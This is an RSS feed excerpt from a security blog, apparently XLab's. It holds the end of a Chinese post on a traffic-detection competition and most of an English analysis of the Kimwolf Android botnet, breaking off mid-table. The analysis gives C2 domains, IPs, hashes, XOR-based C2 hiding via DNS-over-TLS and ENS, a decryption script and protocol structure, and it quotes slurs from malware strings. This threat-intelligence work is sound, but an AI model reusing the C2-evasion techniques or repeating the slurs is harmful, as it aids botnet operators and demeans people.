<p>&#x6BD4;&#x8D5B;&#x4E8E; 2025 &#x5E74; 11 &#x6708; 5 &#x65E5;&#x81F3; 12 &#x65E5;&#x4E3E;&#x884C;&#xFF0C;&#x5171;&#x5438;&#x5F15;&#x4E86; 75 &#x652F;&#x961F;&#x4F0D;&#x63D0;&#x4EA4;&#x6709;&#x6548;&#x6210;&#x7EE9;&#x3002;&#x53C2;&#x8D5B;&#x961F;&#x4F0D;&#x5927;&#x591A;&#x6765;&#x81EA;&#x9AD8;&#x6821;&#x548C;&#x79D1;&#x7814;&#x9662;&#x6240;&#xFF0C;&#x4E5F;&#x6709;&#x90E8;&#x5206;&#x4F01;&#x4E1A;&#x961F;&#x4F0D;&#x3002;&#x7B2C;&#x4E00;&#x540D;&#x961F;&#x4F0D;&#x7684;&#x539F;&#x59CB;&#x5F97;&#x5206;&#x4E3A; 67.795&#xFF0C;&#x6392;&#x540D;&#x524D; 15 &#x7684;&#x961F;&#x4F0D;&#x5F97;&#x5206;&#x5747;&#x8D85;&#x8FC7; 50 &#x5206;&#x3002;</p>
<p>&#x53C2;&#x8D5B;&#x961F;&#x4F0D;&#x91C7;&#x7528;&#x4E86;&#x591A;&#x6837;&#x5316;&#x7684;&#x6280;&#x672F;&#x65B9;&#x6848;&#x3002;&#x5927;&#x90E8;&#x5206;&#x961F;&#x4F0D;&#x9009;&#x62E9;&#x4E86;&#x673A;&#x5668;&#x5B66;&#x4E60;&#x4E0E;&#x6DF1;&#x5EA6;&#x5B66;&#x4E60;&#xFF0C;&#x901A;&#x8FC7;&#x63D0;&#x53D6;&#x81EA;&#x5B9A;&#x4E49;&#x7279;&#x5F81;&#xFF08;&#x5982;&#x8BF7;&#x6C42;&#x65B9;&#x6CD5;&#x3001;XSS&#x7279;&#x5F81;&#xFF09;&#x3001;TF-IDF&#x3001;&#x8BCD;&#x5D4C;&#x5165;&#x7B49;&#x65B9;&#x6CD5;&#xFF0C;&#x7ED3;&#x5408;&#x903B;&#x8F91;&#x56DE;&#x5F52;&#x3001;TextCNN&#x3001;BiLSTM &#x7B49;&#x6A21;&#x578B;&#x8FDB;&#x884C;&#x5206;&#x7C7B;&#x3002;&#x90E8;&#x5206;&#x961F;&#x4F0D;&#x5219;&#x91C7;&#x7528;&#x57FA;&#x4E8E;&#x7279;&#x5F81;&#x7684;&#x76F8;&#x4F3C;&#x5EA6;&#x5339;&#x914D;&#x6216;&#x89C4;&#x5219;&#x7CFB;&#x7EDF;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x4E00;&#x4E9B;&#x961F;&#x4F0D;&#x5229;&#x7528;&#x5927;&#x8BED;&#x8A00;&#x6A21;&#x578B;&#xFF08;LLM&#xFF09;&#x81EA;&#x52A8;&#x751F;&#x6210; Suricata &#x89C4;&#x5219;&#x6216;&#x5173;&#x952E;&#x8BCD;&#x89C4;&#x5219;&#x3002;</p>
<p>&#x4E3A;&#x4E86;&#x63D0;&#x5347;&#x53EC;&#x56DE;&#x7387;&#xFF0C;&#x8BB8;&#x591A;&#x961F;&#x4F0D;&#x6574;&#x5408;&#x4E86;&#x5916;&#x90E8;&#x6570;&#x636E;&#x8D44;&#x6E90;&#xFF0C;&#x9664;&#x8D5B;&#x9898;&#x63A8;&#x8350;&#x7684; Nuclei &#x5B98;&#x65B9;&#x6A21;&#x677F;&#x3001;Exploit-DB &#x548C; Suricata &#x89C4;&#x5219;&#x5916;&#xFF0C;&#x8FD8;&#x5229;&#x7528;&#x4E86; GitHub &#x4E0A;&#x7684;&#x975E;&#x5B98;&#x65B9;&#x6F0F;&#x6D1E;&#x6A21;&#x677F;&#x3001;Fscan/Qscan &#x7B49;&#x626B;&#x63CF;&#x5668;&#x3001; NVD/ScienceDB &#x7B49;&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;&#x5E73;&#x53F0;&#x3001;securityfocus &#x7B49;&#x5B89;&#x5168;&#x793E;&#x533A;&#x8D44;&#x6E90;&#x3002;</p>
<h2 id="%E9%9A%90%E7%A7%81%E5%A3%B0%E6%98%8E">&#x9690;&#x79C1;&#x58F0;&#x660E;</h2>
<p>&#x6211;&#x4EEC;&#x516C;&#x5F00;&#x7684;&#x6570;&#x636E;&#x96C6;&#xFF0C;&#x4EE5;&#x53CA;&#x672A;&#x7ECF;&#x540E;&#x5904;&#x7406;&#x7684;&#x539F;&#x59CB;&#x6570;&#x636E;&#x96C6;&#xFF0C;&#x91C7;&#x96C6;&#x4E8E;&#x6211;&#x4EEC;&#x7684;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x6D89;&#x53CA;&#x4EFB;&#x4F55;&#x6211;&#x53F8;&#x7528;&#x6237;&#x7684;&#x9690;&#x79C1;&#x3002;</p>
<h2 id="%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99">&#x53C2;&#x8003;&#x8D44;&#x6599;</h2>
<ul>
<li>DataCon 2025 &#x5927;&#x6570;&#x636E;&#x5B89;&#x5168;&#x5206;&#x6790;&#x7ADE;&#x8D5B;&#xFF1A;<a href="https://www.datacon.org.cn/datacon-ui-competition/competitions/114/major-ranking?categoryId=249&amp;ref=blog.xlab.qianxin.com">https://www.datacon.org.cn/datacon-ui-competition/competitions/114/major-ranking?categoryId=249</a></li>
<li>Nuclei &#x5B98;&#x65B9;&#x6A21;&#x677F;&#x5E93;&#xFF1A;<a href="https://github.com/projectdiscovery/nuclei-templates?ref=blog.xlab.qianxin.com">https://github.com/projectdiscovery/nuclei-templates</a></li>
<li>Exploit-DB &#x6F0F;&#x6D1E;&#x6570;&#x636E;&#x5E93;&#xFF1A;<a href="https://gitlab.com/exploit-database/exploitdb?ref=blog.xlab.qianxin.com">https://gitlab.com/exploit-database/exploitdb</a></li>
<li>Suricata &#x7F51;&#x7EDC;&#x5165;&#x4FB5;&#x68C0;&#x6D4B;&#x7CFB;&#x7EDF;&#xFF1A;<a href="https://suricata.io/?ref=blog.xlab.qianxin.com">https://suricata.io/</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices]]></title><description><![CDATA[<h1 id="background">Background</h1>
<p>On October 24, 2025, a trusted partner in the security community provided us with a brand-new botnet sample. The most distinctive feature of this sample was its C2 domain, <code>14emeliaterracewestroxburyma02132[.]su</code>, which at the time ranked 2nd in the <a href="https://www.google.com/search?q=https%3A%2F%2Fdevelopers.cloudflare.com%2Fradar%2Fglossary%2F%23domain-rankings&amp;ref=blog.xlab.qianxin.com">Cloudflare Domain Rankings</a>. A week later, it even surpassed Google</p>]]></description><link>https://blog.xlab.qianxin.com/kimwolf-botnet-en/</link><guid isPermaLink="false">69423422f39f9e0001b23b8e</guid><category><![CDATA[DDoS]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[Android]]></category><category><![CDATA[EtherHiding]]></category><category><![CDATA[EN]]></category><category><![CDATA[Proxy]]></category><dc:creator><![CDATA[Wang Hao]]></dc:creator><pubDate>Wed, 17 Dec 2025 13:05:00 GMT</pubDate><media:content url="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_feature-1.png" medium="image"/><content:encoded><![CDATA[<h1 id="background">Background</h1>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_feature-1.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices"><p>On October 24, 2025, a trusted partner in the security community provided us with a brand-new botnet sample. The most distinctive feature of this sample was its C2 domain, <code>14emeliaterracewestroxburyma02132[.]su</code>, which at the time ranked 2nd in the <a href="https://www.google.com/search?q=https%3A%2F%2Fdevelopers.cloudflare.com%2Fradar%2Fglossary%2F%23domain-rankings&amp;ref=blog.xlab.qianxin.com">Cloudflare Domain Rankings</a>. A week later, it even surpassed Google to claim the number one spot in Cloudflare&apos;s global domain popularity rankings. There is no doubt that this is a hyper-scale botnet. Based on the information output during runtime and its use of the wolfSSL library, we have named it <strong>Kimwolf</strong>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_cfno1.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Kimwolf is a botnet compiled using the NDK. In addition to typical DDoS attack capabilities, it integrates proxy forwarding, reverse shell, and file management functions. From an overall architectural perspective, its functional design is not complex, but there are some highlights worth noting: for example, the sample uses a simple yet effective Stack XOR operation to encrypt sensitive data; meanwhile, it utilizes the DNS over TLS (DoT) protocol to encapsulate DNS requests to evade traditional security detection. Furthermore, its C2 identity authentication employs a digital signature protection mechanism based on elliptic curves, where the Bot side will only accept communication instructions after the signature verification passes. Recently, it has even introduced <strong>EtherHiding technology</strong> to counter takedowns using blockchain domains. These features are relatively rare in similar malware. Based on our analysis results, it primarily targets Android platform TV boxes. The &quot;Welcome to Android Support Center&quot; message displayed on the C2 backend also corroborates this.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_banner.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>The Kimwolf samples use a naming rule of &quot;niggabox + v[number]&quot; to identify version numbers. The sample previously provided by our community partner was version v4. After completing the reverse engineering analysis, we imported the sample&apos;s intelligence into the <strong>XLab&apos;s Cyber Threat Insight and Analysis System, successively capturing multiple related samples including v4 and v5, achieving automated continuous tracking of this family</strong>.</p>
<p>On November 30, we captured another new sample of this botnet family and successfully took over one of the C2 domains, thereby obtaining the opportunity to directly observe the true operating scale of this botnet for the first time. Based on statistics from source IP data that established connections with our registered C2 address and whose communication behavior matched Kimwolf C2 protocol characteristics, we observed a cumulative total of approximately 2.7 million distinct source IP addresses over the three days from December 3 to December 5. Among them, we observed approximately 1.36 million active IPs on December 3, about 1.83 million on December 4, and about 1.5 million on December 5 (there is IP overlap between different dates). Analysis indicates that Kimwolf&apos;s primary infection targets are TV boxes deployed in residential network environments. Since residential networks usually adopt dynamic IP allocation mechanisms, the public IPs of devices change over time, so the true scale of infected devices cannot be accurately measured solely by the quantity of IPs. In other words, the cumulative observation of 2.7 million IP addresses does not equate to 2.7 million infected devices.</p>
<p>Despite this, we still have sufficient reason to believe that the actual number of devices infected by Kimwolf exceeds 1.8 million. This judgment is based on observations in the following areas:</p>
<ul>
<li>Kimwolf uses multiple C2 infrastructures. We took over only a portion of the C2s, so we could only observe the activity of some Bots, unable to cover the full picture of the botnet.</li>
<li>On December 4, the number of Bot IPs we observed reached approximately 1.83 million, a historical peak. On that day, parts of the C2s normally used by Kimwolf were taken down by relevant organizations, causing a large number of Bots to fail to connect to the original C2s and turn to try connecting to the C2 we preemptively registered. This anomalous event caused more Bots to be centrally exposed in a short period, so the data for that day may be closer to the lower limit of the true infection scale.</li>
<li>Infected devices are distributed across multiple global time zones. Affected by time zone differences and usage habits (e.g., turning off devices at night, not using TV boxes during holidays, etc.), these devices are not online simultaneously, further increasing the difficulty of comprehensive observation through a single time window.</li>
<li>Kimwolf exists in multiple different versions, and the C2s used by different versions are not completely identical, which is also one of the important reasons why we cannot obtain a complete perspective.</li>
</ul>
<p>Combining the above factors, we conservatively estimate that the actual number of devices infected by Kimwolf has exceeded <strong>1.8 million</strong>. A botnet of such scale possesses the capability to launch massive cyberattacks, and its potential destructive power cannot be ignored.</p>
<p>While working hard to track new versions, we were also full of curiosity about the old versions. Through source tracing analysis, although we failed to capture old versions like v1 or v2, we surprisingly found that Kimwolf is actually associated with the <a href="https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru/">Aisuru botnet</a>. Kimwolf relies on an APK file to load and start it during runtime. A DEX file uploaded to VT from India on October 7 showed obvious homologous characteristics with Kimwolf&apos;s APK. Subsequently, on October 18, the parent APK of that DEX was uploaded to VT from Algeria; the resource files of this APK contained Aisuru samples for 3 CPU architectures: x86, x64, and arm. We speculate that in the early stages of this campaign, the attackers directly reused Aisuru&apos;s code; subsequently, likely because Aisuru samples had high detection rates in security products&#x2014;Android platforms have more mature security protection systems compared to IoT ecosystems&#x2014;the group decided to redesign and develop the Kimwolf botnet to enhance stealth and evade detection.</p>
<p>From the monitoring data of the XLab command tracking system, statistics show that the main functions of the Kimwolf botnet are usually concentrated on traffic proxying, with a small amount of DDoS attacks. However, between November 19 and 22, it suddenly went &quot;crazy&quot;: in just 3 days, it issued 1.7 billion DDoS attack commands, with the attack range covering massive amounts of IP addresses globally. This high-profile spree follows on the heels of the C2 domain&apos;s unprecedented rise to #1 in global popularity. Theoretically, such a large number of attack commands and targets may not be able to produce substantial attack effects on the targets; this behavior may have been purely to demonstrate its own presence.</p>
<p>Currently, the security community&apos;s understanding of Kimwolf presents a polarized situation. <strong>Information in the public intelligence field is scarce</strong>, its propagation path is not yet clear, and the detection rate of related samples and their C2 domains on VirusTotal is extremely low. At the same time, due to the adoption of covert technologies like (DoT), the association between its C2 and samples has not been effectively discovered. However, <strong>at the non-public threat confrontation level</strong>, the situation is entirely different. We observed that Kimwolf&apos;s C2 domains have been successfully taken down by unknown parties at least three times, forcing it to upgrade its tactics and turn to using <code>ENS (Ethereum Name Service)</code> to harden its infrastructure, demonstrating its powerful evolutionary capability. Given that Kimwolf has formed a massive attack scale, and its recent activity frequency and attack behaviors show a significant upward trend, we believe it is necessary to break the intelligence silence. We hereby release this technical analysis report to make relevant research results public, aiming to promote threat intelligence sharing, gather community strength to jointly respond to such threats, and effectively maintain cyberspace security.</p>
<h1 id="timeline">Timeline</h1>
<ul>
<li><strong>October 24</strong>: A trusted community partner provided us with the first Kimwolf sample, version v4.</li>
<li><strong>November 1 to 28</strong>: The Xlab Large-scale Network Threat Perception System independently captured 8 new samples, covering v4 and v5 versions.</li>
<li><strong>December 1</strong>: Xlab successfully took over a C2 domain in version v5, observing a peak daily active bot IP count of approximately 1.83 million.</li>
<li><strong>December 4</strong>: A Kimwolf C2 domain was taken down by an unknown party; the C2 domain could not resolve to a valid IP address.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_error1.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<ul>
<li><strong>December 6</strong>: Xlab captured a new v5 sample again, which enabled 6 new C2 domains.</li>
<li><strong>December 8</strong>: An active downloader server was discovered in the wild, and scripts related to Kimwolf activities were successfully captured.</li>
<li><strong>December 10</strong>: Kimwolf&apos;s new C2 domain was taken down again.</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_error2.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<ul>
<li><strong>December 11</strong>: Xlab captured a new v5 sample again; this sample enabled a brand new C2 domain, but the C2 port was not open; the parent APK certificate was updated.</li>
<li><strong>December 12</strong>: Kimwolf upgraded its infrastructure again, enhancing C2 resilience by introducing ENS domains in response to the multiple previous takedowns, even arrogantly declaring &quot;we have 100s of servers keep trying LOL!&quot;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ens.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h1 id="scale-capability">Scale &amp; Capability</h1>
<p>On December 1, we successfully took over a Kimwolf C2 domain, allowing us to directly assess the true infection scale of this botnet for the first time. Statistically, the cumulative infected IPs exceeded 3.66 million, reaching an activity peak on December 4 with single-day node IPs as high as 1,829,977. Our takeover action seemed to trigger a chain reaction, followed by unknown third parties implementing takedowns (such as stopping DNS resolution) on Kimwolf&apos;s other C2 infrastructures. This forced Kimwolf&apos;s operators to perform emergency upgrades, completely replacing the sample&apos;s C2 configurations, which caused the numbers we observed to drop sharply. currently, the daily active scale is around 200,000.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_sinkhole.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Kimwolf mainly targets the Android platform, involving TVs, set-top boxes, tablets, and other devices. Some device models are shown below:</p>
<table>
<thead>
<tr>
<th>Device Model</th>
<th>Device Model</th>
<th>Device Model</th>
<th>Device Model</th>
</tr>
</thead>
<tbody>
<tr>
<td>TV BOX</td>
<td>SuperBOX</td>
<td>HiDPTAndroid</td>
<td>P200</td>
</tr>
<tr>
<td>X96Q</td>
<td>XBOX</td>
<td>SmartTV</td>
<td>MX10</td>
</tr>
</tbody>
</table>
<p>Infected devices are distributed in 222 countries and regions globally. The top 15 countries are analyzed as: Brazil 14.63%, India 12.71%, USA 9.58%, Argentina 7.19%, South Africa 3.85%, Philippines 3.58%, Mexico 3.07%, China 3.04%, Thailand 2.46%, Saudi Arabia 2.37%, Indonesia 1.87%, Morocco 1.85%, Turkey 1.60%, Iraq 1.53%, Pakistan 1.39%.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_vic-1.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Readers familiar with DDoS might be curious: &quot;For such a huge botnet, what level has its attack capability actually reached?&quot; Although we cannot directly measure it, through observations of two large-scale DDoS events and a horizontal comparison with Aisuru, we believe Kimwolf&apos;s attack capability is close to 30Tbps.</p>
<ul>
<li>A well-known cloud service provider observed a 2.3Bpps attack at 22:09Z on November 23, with 450,000 participating IPs. We confirmed Kimwolf&apos;s participation.</li>
<li>A well-known cloud service provider observed an attack nearing 30Tbps and 2.9Gpps at 09:35Z on December 9. After data comparison, both parties confirmed Kimwolf&apos;s participation.</li>
<li>Cloudflare pointed out in its Q3 2025 DDoS threat report that Aisuru is one of the strongest known botnets currently, with a control scale of millions of IoT/network devices, capable of sustaining Tbps-level attacks and even peak attacks approaching 30 Tbps and 10+ Bpps.</li>
</ul>
<p>In fact, we believe that behind many attacks observed by Cloudflare attributed to Aisuru, it may not just be the Aisuru botnet acting alone; Kimwolf may also be participating, or even led by Kimwolf. These two major botnets propagated through the same infection scripts between September and November, coexisting in the same batch of devices. They actually belong to the same hacker group.</p>
<h1 id="kimwolf-aisuru">Kimwolf &amp; Aisuru</h1>
<p>How did we uncover the connection between Kimwolf and Aisuru? It all started with the APK sample (MD5: b688c22aabcd83138bba4afb9b3ef4fc) captured on October 25. The file and package names were <code>aisuru.apk</code> and <code>com.n2.systemservice0644</code>, respectively. This sample implemented a malicious Android boot receiver, enabling automatic execution upon device startup.</p>
<p>Its main malicious behavior is: extracting a preset binary file (referenced via resource ID <code>R.raw.libniggakernel</code>) from the application&apos;s own <code>res/raw/</code> resource directory, writing it to the application data directory named <code>niggakernel</code>, and then setting the file permission to executable. Subsequently, the sample attempts to obtain root privileges via the <code>su</code> command to execute this malicious program, achieving persistence and system control.</p>
<p>Upon analysis, this preset binary file <code>ji.so</code> is essentially the &quot;kimwolf&quot; malware. The sample previously provided to us by the security community was exactly the unpacked version of this file.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1025apk.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Using various features of the aforementioned APK as clues, we found that the APK (MD5: 887747dc1687953902488489b805d965) has obvious homologous characteristics, such as using the same resource ID name <code>libniggakernel</code>, the same package name <code>systemservice0644</code>, Log identifier &quot;LOL&quot;, preset filename <code>ji.so</code>, etc.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1018apk.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>What surprised us is that the 3 binary files <code>c0.so</code>, <code>ji.so</code>, and <code>q8.so</code> preset in this APK do not belong to the kimwolf family, but to the AISURU botnet. They use the same C2 and Reporter as the sample <code>053a0abe0600d16a91b822eb538987bca3f3ab55</code> mentioned in our September 15 analysis report.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1018aisuru.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>On November 29, more evidence surfaced. Two APK samples uploaded to VirusTotal successively from the United States were highly similar to the two APKs above. Upon analysis, the <code>libdevice.so</code> in their lib directories corresponded to new variants of &quot;kimwolf&quot; and &quot;aisuru&quot; respectively.</p>
<ul>
<li><strong>902cf9a76ade062a6888851b9d1ed30d</strong><br>
Family: kimwolf<br>
Package Name: com.n2.systemservice063<br>
lib file directory: /lib/armeabi-v7a/libdevice.so</li>
<li><strong>8011ed1d1851c6ae31274c2ac8edfc06</strong><br>
Family: aisuru<br>
Package Name: com.n2.systemservice062<br>
lib file directory: /lib/armeabi-v7a/libdevice.so</li>
</ul>
<p>More crucially, these two APKs used the same signing certificate. The certificate SHA1 fingerprint is <strong>182256bca46a5c02def26550a154561ec5b2b983</strong>. The content features of this certificate, such as <code>Common Name: John Dinglebert Dinglenut VIII VanSack Smith</code>, are highly unique and have no public record on the internet. From this, it can be judged that they come from the hands of the same development organization.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_apkcertificate.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>On December 8, we finally had <strong>definitive evidence</strong>. The script captured on the Downloader server 93.95.112.59 directly associated kimwolf (<code>mreo31.apk</code>) and aisuru (<code>meow217</code>) together.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_dlscript.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Cautious readers might ask: &quot;Is there a possibility that the Aisuru group&apos;s code was leaked or sold to a third party?&quot; Frankly speaking, this possibility does exist. Fortunately, although the C2 addresses of the Aisuru samples captured on November 29 mentioned above were updated, they still reused the previously named <code>tiananmeng</code> Reporter. The reuse of infrastructure strongly eliminates the possibility of third-party code reuse. <strong>In summary, we have high confidence in attributing Kimwolf to the Aisuru group</strong>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_aisurunew.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h1 id="technical-details">Technical Details</h1>
<p>The Kimwolf samples we captured can be divided into two major versions: v4 and v5. In v4, Kimwolf&apos;s author, either out of bad taste or to express political attitudes, liked to output various information in the console.</p>
<ul>
<li>sample 18dcf61dad028b9e6f9e4aa664e7ff92 outputs <code>$$ ForeheadSDK v2.0 Premium Edition $$</code>;</li>
<li>sample 2078af54891b32ea0b1d1bf08b552fe8 outputs <code>Kim Jong-un Leads Our Nation to Strength. Long live our Supreme Leader!</code>.</li>
</ul>
<p>The most exaggerated one is sample <code>1c03d82026b6bcf5acd8fc4bcf48ed00</code>, which, besides outputting a series of political views, specifically mocked the well-known cybersecurity investigative journalist Krebs, calling him <strong>&quot;Big Forehead&quot;</strong> (KREBSFIVEHEADFANCLUB), and even jokingly asked the Xlab team to <strong>&quot;taste virgin boy eggs&quot;</strong> (VIRGINBOYEGGSFORXLAB).</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_console3.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Kimwolf&apos;s author is quite vengeful. After we preemptively registered their C2, they immediately counterattacked, leaving an &quot;easter egg&quot; in the DDoS attack method of <code>ssl_socket</code> to stigmatize Chinese people. regarding this, we just want to say: &quot;Sooner or later, you&apos;ll taste our iron fist.&quot;</p>
<pre><code>idontlikemchineseniggas
becausetheylikeitrealyoung
myniggatheylikeit131415.com
</code></pre>
<p>The core malicious functions of v4 and v5 versions are highly consistent. The execution flow of these samples can be summarized as follows: after the sample starts on the infected device, it first achieves single instance by creating a file socket to ensure only one process runs continuously on the same device; subsequently, it decrypts the embedded C2 domain, and to evade conventional detection, uses the DNS-over-TLS protocol to initiate queries to the port 853 of public DNS services (8.8.8.8 or 1.1.1.1) to obtain the real C2 IP; finally, it establishes a communication connection with that IP, entering a waiting state, ready to receive and execute commands from the control end at any time.</p>
<p>The most significant difference between v4 and v5 versions lies in the method of obtaining the real C2 IP: v4 version directly uses DNS to query the A record of the C2 domain, while v5 version, after querying the IP, requires an XOR operation. Taking C2 domain <code>rtrdedge1.samsungcdn[.]cloud</code> as an example, the IP resolved on December 3 was <code>44.7.0.45</code>; after XORing with <strong>0xce0491</strong>, the real C2 IP <code>45.206.3.189</code> is obtained.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_realip.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>On December 12, Kimwolf began using <strong>EtherHiding technology</strong>. The sample introduced an ENS domain (Ethereum Name Service), <strong>pawsatyou.eth</strong>, with the C2 hidden in the &quot;lol&quot; text record.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_enslol.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>But the real C2 is not the IPv6 in &quot;lol&quot;, but rather obtained by taking the last 4 bytes of the address and performing an XOR operation to get the real IP. Taking <code>fed0:5dec:ea5e:d013:130:9:1be7:8599</code> as an example, taking the last 4 bytes <strong>1b e7 85 99</strong> and XORing with <strong>0x93141715</strong> yields the real C2 IP <code>136.243.146.140</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_decipv6.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>The technical essence of ENS is a system of smart contracts deployed on Ethereum. The contract address for <code>pawsatyou.eth</code> is <code>0xde569B825877c47fE637913eCE5216C644dE081F</code>. Readers familiar with smart contracts will not find it difficult to understand the advantage behind this design: Kimwolf implements a channel similar to cloud configuration for C2 via the contract. Even if the C2 IP is taken down, the attacker only needs to update the <code>lol</code> record to quickly issue a new C2. And this channel itself relies on the decentralized nature of blockchain, unregulated by Ethereum or other blockchain operators, and cannot be blocked.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_updatec2.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>Overall, Kimwolf&apos;s functions are not complex. The following text will take the sample captured on December 9 as the main analysis object to dissect Kimwolf&apos;s technical details from aspects of <strong>string decryption, single instance, and network protocols</strong>.</p>
<pre><code>MD5: 3e1377869bd6e80e005b71b9e991c060
MAGIC: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
PACKER: UPX

</code></pre>
<h2 id="string-decryption">String Decryption</h2>
<p>Kimwolf uses simple Stack XOR operations to encrypt sensitive data like C2, DNS Resolver, etc. A large number of similar code snippets can be seen in the pseudo-code decompiled by IDA. <code>veorq_s64</code> is an 8-byte XOR instruction, so decryption is simple: one can use regex to extract the operands and then perform the XOR. In the figure below, the content decrypted by v63 is exactly the C2 <code>staging.pproxy1[.]fun</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_xor.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>I believe readers who have tried manual decryption will find this very inconvenient and ask if there is a more efficient method. The answer is yes. With a little observation of the code snippet above, we know that the decrypted C2 string is the 2nd parameter of function <code>sub_8F00</code>. Based on this characteristic, we can use an emulator to achieve batch automatic decryption of C2s.</p>
<pre><code class="language-python">import flare_emu

eh=flare_emu.EmuHelper()
def iterateHook(eh, address, argv, userData):
   
    if eh.isValidEmuPtr(argv[1]):
        buf=eh.getEmuString(eh.getRegVal(&apos;R1&apos;))
        print(f&quot;0x{address:x} ---&gt; {buf}&quot;)

eh.iterate(0x00008F00,iterateHook)

</code></pre>
<p>The final effect is as follows, successfully decrypting 6 C2s:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_decryption.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<p>The instruction code for <code>veorq_s64</code> is <code>VEOR Q8, Q8, Q9</code>. Through it, we can locate all functions where encrypted strings are located. Then, based on the patterns presented in different functions, using <code>flare_emu</code>&apos;s <code>iterate</code> or <code>emulateRange</code> can conveniently achieve decryption of all sensitive strings.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_pattern.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h2 id="single-instance">Single Instance</h2>
<p>Kimwolf disguises its own process name as <code>netd_services</code> or <code>tv_helper</code>, and uses a Unix domain socket named <code>@niggaboxv[number]</code> to implement single instance control. This combination of features can be used as a high-confidence Indicator of Compromise (IOC) for device troubleshooting.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_unix.png" alt="Kimwolf Exposed: The Massive Android Botnet with 1.8 Million Infected Devices" loading="lazy"></p>
<h2 id="network-protocol">Network Protocol</h2>
<p>Kimwolf&apos;s network communication always uses TLS encryption. In early versions, the application layer protocol was directly carried over the TLS tunnel; in the current version, a websocket handshake is performed before sending the <code>register</code> message, but the protocol is not used subsequently. Its network communication packets follow a fixed &quot;Header + Body&quot; format. In the Header, the Reserved field is a fixed value 1, while the Magic has iterated three times, currently being &quot;AD216CD4&quot;; the structure of the message body varies depending on the message type.</p>
<pre><code class="language-go">type Header struct {
	Magic    [4]byte  // &quot;DPRK&quot; -&gt; &quot;FD9177FF&quot; -&gt; &quot;AD216CD4&quot;
	Reserved uint8    // 1
	MsgType  uint8
	MsgID    uint32
	BodyLen  uint32
	CRC32    uint32
}
</code></pre>
<p>The MsgType field is used to explain the message type. Its values and corresponding functions are shown in the table below:</p>
<table>
<thead>
<tr>
<th>MsgType</th>
<th>desc</th>
</tr>
